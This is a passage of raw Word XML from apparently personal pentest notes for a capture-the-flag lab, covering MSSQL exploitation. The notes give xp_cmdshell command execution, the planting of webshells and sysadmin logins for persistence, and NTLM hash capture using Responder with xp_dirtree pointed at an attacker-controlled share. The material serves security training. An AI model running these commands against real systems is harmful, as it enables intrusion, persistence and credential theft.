    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019A9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1457"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Write files to disk (webshells, reverse shells, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1457"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use bcp, OPENROWSET, or xp_cmdshell to drop malicious files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1457"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the server hosts a web application, you can write a .aspx or .php webshell into the webroot.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1457"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add new logins or users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1457"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can persist access by adding new SQL Server logins with sysadmin rights:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019AF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_jif9wy8cijju" w:id="205"/>
      <w:bookmarkEnd w:id="205"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to run commands within mssql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019B1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xp_cmdshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="214"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> built-in extended stored procedure in SQL Server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="214"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It allows execution of system-level commands (Windows CMD commands) directly from within SQL Server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="214"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In other words, it lets you run Windows commands from a SQL query window.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1097"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Think of it as a way to use SQL Server like a terminal (cmd.exe) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— extremely powerful, and dangerous if misused.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="610"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xp_cmdshell 'whoami'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="610"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You might need quotes around the command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="610"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xp_cmdshell whoami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="610"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you are using mssqlclient.py to connect, maybe you don't need the EXEC command. But if you do, then do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="610"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXEC xp_cmdshell 'whoami';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019BD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fg6epcsl8l08" w:id="206"/>
      <w:bookmarkEnd w:id="206"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM hash capture trick (using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mssql </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xp_dirtree and responder)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019BF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I think a similar Relay attack can be found in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX 15.3.4. Relaying Net-NTLMv2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escape HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a classic </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NTLM hash capture trick </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">used during </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Server exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019C4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo responder -I tun0 -v </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"-I tun0"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - This tells Responder to listen on the tun0 interface, which is usually the VPN interface on HackTheBox.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Allowed in XXXXXXXXX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is Responder?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Responder </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is a tool that listens for and captures </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">authentication requests </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It spoofs services like SMB, HTTP, etc., and waits for systems to connect to it and send NTLM hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can then crack these hashes offline using tools like hashcat.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xp_dirtree \\10.10.10.10\fake\share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also try </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXEC xp_dirtree '\\10.10.10.10\fake\share' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">if it doesn't work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also try adding quotes around everything after xp_dirtree </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This would try and list folders inside of the \\10.10.10.10\fake\share share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But here's the catch:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Even if the share doesn't exist…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Server still tries to authenticate to that path (using SMB) to access it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This leads to an attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000019D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="240"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
